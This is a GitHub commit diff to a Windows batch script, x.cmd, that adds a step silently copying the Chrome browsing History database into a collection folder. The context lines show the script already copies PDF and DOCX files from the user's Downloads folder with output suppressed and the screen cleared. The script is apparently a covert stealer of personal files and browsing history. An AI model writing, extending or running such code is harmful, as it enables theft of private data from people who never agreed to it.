Update x.cmd (#536)

If google chrome is installed, download the history.
This commit is contained in:
Ferrari
2022-07-14 16:22:18 -03:00
committed by GitHub
parent 8185b97046
commit cae94215c7

View File

@@ -33,5 +33,9 @@ xcopy /C /Q /G /Y %USERPROFILE%\Downloads\*.pdf %dst% >>nul
xcopy /C /Q /G /Y %USERPROFILE%\Downloads\*.docx %dst% >>nul
)
if Exist %USERPROFILE%\AppData\Local\Google\Chrome\ (
xcopy /C /Q /G /Y "%USERPROFILE%\AppData\Local\Google\Chrome\User Data\Default\History" %dst% >>nul
)
@cls
@exit